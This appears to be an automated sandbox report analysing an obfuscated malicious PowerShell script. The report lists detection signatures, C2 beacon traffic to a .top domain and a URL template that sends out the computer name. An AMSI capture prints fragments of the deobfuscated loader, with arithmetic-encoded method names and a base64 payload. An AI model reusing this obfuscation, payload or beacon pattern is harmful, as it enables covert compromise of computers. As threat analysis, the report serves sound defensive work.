Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
download.ps1

Overview

General Information

Sample name:download.ps1
Analysis ID:1579457
MD5:f710ad70e1fe42d5174f289867a61f93
SHA1:5d2c8485c88fef6f88db24094b6b39f1628825a7
SHA256:d9eb14b6a8ce5658354baad69321096594b107cfa096fb7468d8f1c9c02487e5
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Loading BitLocker PowerShell Module
Queries Google from non browser process on port 80
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64native
  • powershell.exe (PID: 4572 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 5812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup
No configs have been found
No yara matches
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5048, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 4572, ProcessName: powershell.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5048, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 4572, ProcessName: powershell.exe
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-22T13:48:12.044137+010028593911Domain Observed Used for C2 Detected192.168.11.20589561.1.1.153UDP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: download.ps1Virustotal: Detection: 13%Perma Link
Source: Binary string: System.Management.Automation.pdb` source: powershell.exe, 00000000.00000002.137613990114.00000230FB7B3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbicrosoft Irelandq source: powershell.exe, 00000000.00000002.137613990114.00000230FB761000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: t.Automation.pdbdb@8 source: powershell.exe, 00000000.00000002.137612256906.00000230FB630000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.137610309046.00000230FB280000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.137613990114.00000230FB761000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.137610309046.00000230FB280000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.137612256906.00000230FB630000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.137613990114.00000230FB7B3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000000.00000002.137612256906.00000230FB630000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.137613990114.00000230FB7B3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.137612256906.00000230FB6E4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.137613990114.00000230FB7B3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.137612256906.00000230FB6E4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb.ps1 source: powershell.exe, 00000000.00000002.137612256906.00000230FB6E4000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior

Networking

barindex
Source: Network trafficSuricata IDS: 2859391 - Severity 1 - ETPRO MALWARE TA582 Domain in DNS Lookup : 192.168.11.20:58956 -> 1.1.1.1:53
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Connection: Keep-Alive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHTTP traffic: GET /sorry/index?continue=http://www.google.com/&q=EgRmgZjNGI2VoLsGIjD67lPq7j91CFvVoDyfLmk3ebYGs4fSwa7kJc5SKfazqapl2GCINOoUmaA8KQ9bx1gyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Cookie: NID=520=ahrQ-LC_SZ7Of9mG7QXjZpf_wOZJr4vXrlJpizjuZKF4x-KbjlBwRL7HJdcSEEPVMU1W9Q0qnhPdxv1Irf-36GJQttOMPg9J89HVOoDhN01pxBTksREng5acfABjaoiIzXz-YtdMAGnC8TRJgie_snlItVmfDj8vOVrURqGydTvfhdPMX4PqJIT5BQ87_MMGq05uaA
Source: Joe Sandbox ViewIP Address: 45.61.136.138 45.61.136.138
Source: global trafficHTTP traffic detected: GET /tj9wps52g1htr.php?id=computer&key=19746202345&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cmacnnkfbhlcncm.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /sorry/index?continue=http://www.google.com/&q=EgRmgZjNGI2VoLsGIjD67lPq7j91CFvVoDyfLmk3ebYGs4fSwa7kJc5SKfazqapl2GCINOoUmaA8KQ9bx1gyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comCookie: NID=520=ahrQ-LC_SZ7Of9mG7QXjZpf_wOZJr4vXrlJpizjuZKF4x-KbjlBwRL7HJdcSEEPVMU1W9Q0qnhPdxv1Irf-36GJQttOMPg9J89HVOoDhN01pxBTksREng5acfABjaoiIzXz-YtdMAGnC8TRJgie_snlItVmfDj8vOVrURqGydTvfhdPMX4PqJIT5BQ87_MMGq05uaA
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /tj9wps52g1htr.php?id=computer&key=19746202345&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cmacnnkfbhlcncm.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /sorry/index?continue=http://www.google.com/&q=EgRmgZjNGI2VoLsGIjD67lPq7j91CFvVoDyfLmk3ebYGs4fSwa7kJc5SKfazqapl2GCINOoUmaA8KQ9bx1gyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comCookie: NID=520=ahrQ-LC_SZ7Of9mG7QXjZpf_wOZJr4vXrlJpizjuZKF4x-KbjlBwRL7HJdcSEEPVMU1W9Q0qnhPdxv1Irf-36GJQttOMPg9J89HVOoDhN01pxBTksREng5acfABjaoiIzXz-YtdMAGnC8TRJgie_snlItVmfDj8vOVrURqGydTvfhdPMX4PqJIT5BQ87_MMGq05uaA
Source: global trafficDNS traffic detected: DNS query: cmacnnkfbhlcncm.top
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: powershell.exe, 00000000.00000002.137575649447.00000230E442A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://$iba40z739y1rlcp/$nfe6owql0ibuxm9.php?
Source: powershell.exe, 00000000.00000002.137575649447.00000230E442A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.137575649447.00000230E5592000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://$iba40z739y1rlcp/$nfe6owql0ibuxm9.php?id=$env:computername&key=$rsbjcivwtqdkf&s=527
Source: powershell.exe, 00000000.00000002.137575649447.00000230E4299000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.137575649447.00000230E40C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cmacnnkfbhlcncm.top
Source: powershell.exe, 00000000.00000002.137575649447.00000230E40C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cmacnnkfbhlcncm.top/tj9wps52g1htr.php?id=computer&key=19746202345&s=527
Source: powershell.exe, 00000000.00000002.137575649447.00000230E40C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cmacnnkfbhlcncm.top/tj9wps52g1htr.php?id=computer&key=19746202345&s=527p
Source: powershell.exe, 00000000.00000002.137610309046.00000230FB2F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000000.00000002.137610309046.00000230FB2D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000000.00000002.137611950798.00000230FB500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micr
Source: powershell.exe, 00000000.00000002.137602284758.00000230F31E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.137575649447.00000230E339B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.137575649447.00000230E339B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngXzp#
Source: powershell.exe, 00000000.00000002.137575649447.00000230E339B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000000.00000002.137575649447.00000230E3171000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.137575649447.00000230E339B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000000.00000002.137575649447.00000230E339B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.137575649447.00000230E339B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXzp#
Source: powershell.exe, 00000000.00000002.137575649447.00000230E4299000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com
Source: powershell.exe, 00000000.00000002.137575649447.00000230E449E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/
Source: powershell.exe, 00000000.00000002.137575649447.00000230E42B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/&q=EgRmgZjNGI2VoLsGIjD67lPq7j91CFvVoDyfLmk3ebYGs4fSwa7kJc5SKfazqapl2GCINOoUmaA
Source: powershell.exe, 00000000.00000002.137575649447.00000230E4299000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgRmgZjNGI2VoLsGIjD67lPq7j91CFvV
Source: powershell.exe, 00000000.00000002.137610309046.00000230FB2F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
Source: powershell.exe, 00000000.00000002.137575649447.00000230E3171000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.137602284758.00000230F31E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.137602284758.00000230F31E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.137602284758.00000230F31E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.137575649447.00000230E4299000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
Source: powershell.exe, 00000000.00000002.137575649447.00000230E339B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.137575649447.00000230E339B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/PesterXzp#
Source: powershell.exe, 00000000.00000002.137575649447.00000230E53AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.137602284758.00000230F31E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.137610309046.00000230FB2F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: powershell.exe, 00000000.00000002.137575649447.00000230E42B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.137575649447.00000230E4299000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.137575649447.00000230E42C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/api.js
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFBEA808C620_2_00007FFBEA808C62
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFBEA807EB60_2_00007FFBEA807EB6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFBEAA62D380_2_00007FFBEAA62D38
Source: classification engineClassification label: mal72.evad.winPS1@2/7@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5812:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5812:304:WilStaging_02
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rt53js32.5x1.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $g3v0touqxl2f4wy.((-join (@((3232-3165),(45954/414),(1488-(7936768/(5602+166))),(592-(6765-(7114-820))),(8864-8780),(4832-4721))| ForEach-Object { [char]$_ })))( $gpo5ezai6d24hv7 ) $g3v0touqxl2f4wy.((-join (@((1496-1429),(5486-(-4828+(3335+6871))),(631-(5138120/9881)),(979915/(67954975/(2106+(13767-(11751-(8590-4737)))))),(597920/(4919+(-4981+(11062-(35905440/(5633196/(7669-(6693328/974)))))))))| ForEach-Object { [char]$_ })))()$6drif729juxecgq.(([char[]]@((164351/2453),(929016/8602),(5528-(12984-(908040/120))),(1070880/(67167456/7213)),(666-(4949-4384))) -join ''))()[byte[]] $o73bgwy04a2hprd = $gpo5ezai6d24hv7.(([system.String]::new(@((-3378+3462),(4009-3898),(-2202+(-7098+9365)),(393870/(10997-(13115538/1739))),(2459-(-1128+(7365-(31669204/8137)))),(3614-(12823-9306)),(-2588+2709)))))() $74wcu51lgv832dk=$o73bgwy04a2hprd return $74wcu51lgv832dk}[System.Text.Encoding]::ascii.(([system.String]::new(@((-8460+(11638-3107)),(-9789+9890),(294-178),(3119-3036),(4845-4729),(-5591+(13577-7872)),(56280/536),(9713-(19126-(7189+2334))),(742733/(10673-3462))))))((e8ldxb2uzitpq7hg3jkawmo496n "ZeN4NmIweXVrdtGloeZt4RO21jYvmdRYSp7ugviNt3JmMmYBC8YSNZN1V3FOViN6CEzuAn66Qy2A6IuWkCXhIqWUGTF9Oqr15IalXTfN/t8FCRbSaZOHwKH3tpuwDZjg2X+HSZrehZuC/YsWtDcuaVxLA4uDn5H8jb/v6ZzBhZ+ek7PmRZSG/7/TBisz2ZvMhue/qF5PAAgeg7PSAb9faf7tQMsS51/+VTaMxoDKm7zyyTpmJ1YNzodX5kjSDhHFzYvB+1Lzr59XjZABHYJFWqWqGpVQiFLBvBJsF5eFz6mhjoPqGeYTC6QqG6coBK1QU8lnzTudXNvakqTmKQBV0k/+TYzFsVXaohL8jDeswOCtGatvPCQr1HTKhAD5wKBpwZau0ar76OqoU8Mol5JdcQxuG7mE3hfGJAwJA4uuSmEwIw5aU9tWzaLE3NvKWSMXZP8TrCFPFtgcgcCeMjXHHAEJj6sb+TQDBZgERV+eRbEdkqXbaA/ZUQ3PCpLXCJnViIExzTtiNOQUszBrmH+XLqnUl8NUyxFmB2UbnRHaAlijQtDbay++e7kPEhhGoOnsLpPNA6T22x5kFUmAfBXfxrdqM6A8wfzKACTZs7hapQdAq2sa3N2Wn6+sWgcPrdXuIq58yk/GJ7NVMC9HCMG2D9RTmO8G4NgkKYFZwq7Hr7H2xQ0EzsFVRKjNtfbusUEjrCTMGqXsi7kOBspS1EtcMrbA9kCRl/VSib3mAFQu6vWVrYV2tcaO1bzJ2oBAgduHQtdOyhbIm4m+y88WFZef14WDyu6NgKS6Dp7ng+wVtGsS7by3X9p3TPxiPjw0vSG25RO/a0OgOlhD4udVQ5wNQbGYMrkcrPr0ygLnDGUlMr7Gkekx8Z6h5yEaFJ5KXez+KlgdjHdB4wfCQ5x0EKc0R9KdrFNaG7alvj1f87Xq/zflek0MUAioHDCdCl/GGPlyl9eqz1TxRRnO/OYrQ+moWluBk02VXu67T6XUfZD0VDuqAkcTCEJTIWxB6Waz1k89MxzSDBCcRRNxEqXV54joTzpmyYsCZslWflGhLbhootnRYua98oxHYHSkhEbwqh7IkJqKyrPBj4C6ve+K5VbJwy0PxHQ58ZHboeuN3oXzNsLAKLjGgJSCjTXnpguau+fclIkI+hsgWFCZ0hGOPizlksUQI67jGiv1Bnu0htmdPrvG49GN6qbmldQXyJi+yYaxqFqoHR9eT7vzhQx8m6S3ouSh3StWtIUuIWHwj/bihJ8I6XvXJTWszYTDurqADega6/q6pDifHt5waDMb2bePXlPAKZFydz5+dNvklhcgX9VlX9wNzPPrWI5ydghj681cJAIll1ajhAUC9/keu2CF9OPA7k+93KMFmcF5otLkJUvTiL82lFUOR6EJTT1OXxvf4Cq87K9559rWscQWICXphUDfwabJEa8s5gGT67nCppjAmFvEjIqJOc0uJQiYnr36wS9Tmp1JC8zIjYVa8wJ0tDjwQ3+OqqOvMOB+nOPPT3fLb2Wpt4S/EptFv8i6Y8TIjsVK29iBBVSrYg7L3pJFpOygWa3nV0yp1scO2yQiktF1NwfCpE44cEJCX16+zwPBcOlkp2nZuDp0hts7bBYrZB86bl+T5MUb1PoXXujBeYpuvYDONMbdRUG+7LXpF0NG+Xy6dCDeLUVobqM8smpeNnAzQAz0W4AkVdLIGFst3zO5hgzsE6Lgw+kfxhFUA/xM+xyEwsa2GV6J5qR4HQoItHeeHHkudNN2Gj8GKGE1HytVvCVmcvhmzjFvacwOmxk9vZSlvmJgYzDmfC/BWMl5G3xa9LxWLGgulhQzuWesc48n6y
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: download.ps1Virustotal: Detection: 13%
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
